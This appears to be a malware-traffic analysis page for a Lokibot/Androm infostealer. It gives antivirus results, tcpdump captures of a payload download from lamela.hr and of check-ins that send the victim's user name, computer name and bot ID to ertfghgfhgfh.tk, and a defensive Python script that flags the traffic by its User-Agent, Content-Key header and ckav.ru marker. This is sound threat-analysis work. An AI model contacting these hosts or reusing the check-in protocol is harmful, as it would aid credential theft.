Androm / Lokibot infostealer malware traffic sample (PCAP download and analysis): lamela.hr, ertfghgfhgfh.tk, POST /Panel/five/fre.php, User-Agent "Mozilla/4.08 (Charon; Inferno)"

Download attachment: "pcap wire" (PCAP, 1,003 KB, added May 15, 2017 2:59 am)
Antivirus detection results for the downloaded payload (16 of the 37 detecting engines are listed):

SHA256:          6c99dd395a98d20237d05527e84ef8d0d2f9f2a599494ee0632c7bfab2399e33
File name:       wire145.exe
Detection ratio: 37 / 61
Analysis date:   2017-05-15 02:54:56 UTC

Vendor                                   Detection name                               Signature date
Kaspersky                                Backdoor.Win32.Androm.ngwk                   20170515
McAfee                                   Artemis!F65BE5A2E77C                         20170515
McAfee-GW-Edition                        BehavesLike.Win32.Virus.th                   20170514
eScan                                    Trojan.GenericKD.5065116                     20170515
NANO-Antivirus                           Trojan.Win32.Androm.eotpjr                   20170514
Palo Alto Networks (Known Signatures)    generic.ml                                   20170515
Panda                                    Trj/GdSda.A                                  20170514
Qihoo-360                                Trojan.Generic                               20170515
Rising                                   Malware.Generic.3!tfe (cloud:DiQytucAL2U)    20170515
Sophos                                   Mal/Generic-S                                20170514
Symantec                                 Infostealer.Lokibot                          20170514
Tencent                                  Win32.Trojan.Inject.Auto                     20170515
TrendMicro-HouseCall                     Suspicious_GEN.F47V0513                      20170515
VIPRE                                    Trojan.Win32.Generic!BT                      20170515
Webroot                                  W32.Trojan.Gen                               20170515
ZoneAlarm by Check Point                 Backdoor.Win32.Androm.ngwk                   20170514

The Kaspersky-family engines name the sample Androm; Symantec's Infostealer.Lokibot is the name that matches the check-in traffic below.

Relevant HTTP requests from the capture (tcpdump -A output, oldest first; the binary IP/TCP header bytes that tcpdump prints as dots in front of each request line have been dropped, leaving the request line and headers):

2017-05-14 21:26:44.615814 IP 192.168.1.102.58035 > 176.62.8.9.80: Flags [P.], seq 0:394, ack 1, win 256, length 394: HTTP: GET /wire145.exe HTTP/1.1
GET /wire145.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: lamela.hr
Connection: Keep-Alive

2017-05-14 21:27:25.906564 IP 192.168.1.102.58037 > 42.112.16.178.80: Flags [P.], seq 0:246, ack 1, win 256, length 246: HTTP: POST /Panel/five/fre.php HTTP/1.0
POST /Panel/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: ertfghgfhgfh.tk
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: CDE60214
Content-Length: 208
Connection: close

2017-05-14 21:27:26.191163 IP 192.168.1.102.58037 > 42.112.16.178.80: Flags [P.], seq 246:454, ack 1, win 256, length 208: HTTP
(208-byte body of the check-in; tcpdump -A prints non-printable bytes as '.', so the dotted letters are UTF-16LE wide strings whose NUL high bytes show as dots)
ckav.ru                                            (fixed marker at the start of the Loki-Bot check-in body)
u.s.e.r.n.a.m.e.1.3.4                              = username134                (user name)
W.I.N.-.F.7.0.7.6.K.T.Q.1.P.5                      = WIN-F7076KTQ1P5            (computer name, sent twice)
3.D.F.D.8.1.C.0.7.0.8.A.4.B.C.A.3.3.3.5.F.6.4.B    = 3DFD81C0708A4BCA3335F64B   (24-hex-digit per-host bot identifier)
dRbP1

(The next request is the host's own Windows Update check; it is kept because it sits between the two check-ins, not because it is malicious.)

2017-05-14 21:28:04.178218 IP 192.168.1.102.58043 > 8.254.247.46.80: Flags [P.], seq 345:518, ack 24469, win 256, length 173: HTTP: HEAD /v9/windowsupdate/redir/muv4wuredir.cab?1705150125 HTTP/1.1
HEAD /v9/windowsupdate/redir/muv4wuredir.cab?1705150125 HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Windows-Update-Agent
Host: download.windowsupdate.com

2017-05-14 21:30:57.454058 IP 192.168.1.102.58053 > 42.112.16.178.80: Flags [P.], seq 0:246, ack 1, win 256, length 246: HTTP: POST /Panel/five/fre.php HTTP/1.0
POST /Panel/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: ertfghgfhgfh.tk
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: CDE60214
Content-Length: 181
Connection: close
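The two check-ins above, and the payload fetch that precedes them, can be picked out of reassembled HTTP requests by three things that are visible in the capture: the hard-coded User-Agent "Mozilla/4.08 (Charon; Inferno)", the non-standard Content-Key header, and a body that starts with ckav.ru and carries the user name, computer name and bot identifier as UTF-16LE strings. The script below is an added example written for this page; it is not code from the page, from the pcap or from the malware. It parses constructed requests built from the headers printed above (the check-in body is a reconstruction that embeds the recovered strings, not the original 208 bytes; the second check-in's 181-byte body is not reproduced on the page at all), classifies each request, checks that the body length matches Content-Length, and decodes the wide strings.

```python
import re
from dataclasses import dataclass, field

LOKI_UA = b"Mozilla/4.08 (Charon; Inferno)"      # hard-coded UA on both POSTs above
LOKI_MARKER = b"ckav.ru"                           # first bytes of the check-in body
WIDE_RE = re.compile(rb"(?:[\x20-\x7e]\x00){4,}")  # 4+ printable UTF-16LE chars


@dataclass
class Finding:
    stage: str              # "payload-fetch", "lokibot-checkin" or "other"
    host: str
    path: str
    notes: list = field(default_factory=list)


def parse_request(raw: bytes):
    """Split one reassembled HTTP/1.x request into (method, path, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, path, _version = lines[0].split(b" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode("ascii", "replace")] = value.strip()
    return method, path, headers, body


def wide_strings(body: bytes):
    """Recover the UTF-16LE runs that tcpdump -A shows as u.s.e.r.n.a.m.e."""
    return [m.group().decode("utf-16-le") for m in WIDE_RE.finditer(body)]


def classify(raw: bytes) -> Finding:
    """Tag one request as payload fetch, Loki-Bot check-in, or other."""
    method, path, headers, body = parse_request(raw)
    finding = Finding("other", headers.get("host", b"").decode("ascii", "replace"),
                      path.decode("ascii", "replace"))
    if method == b"POST" and headers.get("user-agent") == LOKI_UA:
        finding.stage = "lokibot-checkin"
        finding.notes.append("User-Agent is the Loki-Bot hard-coded string")
        if "content-key" in headers:
            finding.notes.append("Content-Key: " + headers["content-key"].decode("ascii", "replace"))
        if body.startswith(LOKI_MARKER):
            finding.notes.append("body starts with the ckav.ru marker")
        # The body travels in a later TCP segment than the headers (seq 246:454
        # above); a length mismatch means the stream was not fully reassembled.
        declared = int(headers.get("content-length", b"0"))
        if declared != len(body):
            finding.notes.append(f"Content-Length {declared} but body is {len(body)} bytes")
        finding.notes.extend("wide string: " + s for s in wide_strings(body))
    elif method == b"GET" and path.lower().endswith(b".exe"):
        finding.stage = "payload-fetch"
        finding.notes.append("executable fetched over plain HTTP")
    return finding


def scan(requests):
    """Classify every request; returns the list of Findings."""
    return [classify(r) for r in requests]


# --- CONSTRUCTED sample input, built from the headers printed on this page. ---
def _wide(s: str) -> bytes:
    return s.encode("utf-16-le")

# Reconstructed check-in body: marker, then the recovered wide strings, NUL-padded.
CHECKIN_BODY = (LOKI_MARKER + b"\x00" * 6
                + _wide("username134") + b"\x00" * 4
                + _wide("WIN-F7076KTQ1P5") + b"\x00" * 4
                + _wide("WIN-F7076KTQ1P5") + b"\x00" * 12
                + _wide("3DFD81C0708A4BCA3335F64B") + b"\x00" * 2)

SAMPLE_FETCH = b"\r\n".join([
    b"GET /wire145.exe HTTP/1.1",
    b"Accept: image/jpeg, application/x-ms-application, image/gif, */*",
    b"User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)",
    b"Host: lamela.hr", b"Connection: Keep-Alive", b"", b""])

SAMPLE_CHECKIN = b"\r\n".join([
    b"POST /Panel/five/fre.php HTTP/1.0",
    b"User-Agent: Mozilla/4.08 (Charon; Inferno)",
    b"Host: ertfghgfhgfh.tk", b"Accept: */*",
    b"Content-Type: application/octet-stream", b"Content-Encoding: binary",
    b"Content-Key: CDE60214",                 # value copied from the capture
    b"Content-Length: %d" % len(CHECKIN_BODY),
    b"Connection: close", b"", b""]) + CHECKIN_BODY

SAMPLE_WU = b"\r\n".join([          # the benign Windows Update check between the POSTs
    b"HEAD /v9/windowsupdate/redir/muv4wuredir.cab?1705150125 HTTP/1.1",
    b"User-Agent: Windows-Update-Agent", b"Host: download.windowsupdate.com", b"", b""])

if __name__ == "__main__":
    for f in scan([SAMPLE_FETCH, SAMPLE_CHECKIN, SAMPLE_WU]):
        print(f"{f.stage:16} {f.host} {f.path}")
        for note in f.notes:
            print("    " + note)
```

To run it over the real capture, reassemble each request first (tshark -r wire.pcap -Y http.request -T fields -e tcp.stream -e http.host -e http.request.uri lists the streams, and tshark -r wire.pcap -z follow,tcp,raw,<stream> dumps one of them) and pass the request bytes to classify(). The same three indicators are what a network signature would key on; the Content-Key value and the hex bot identifier are per-host and should not be hard-coded into a rule.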
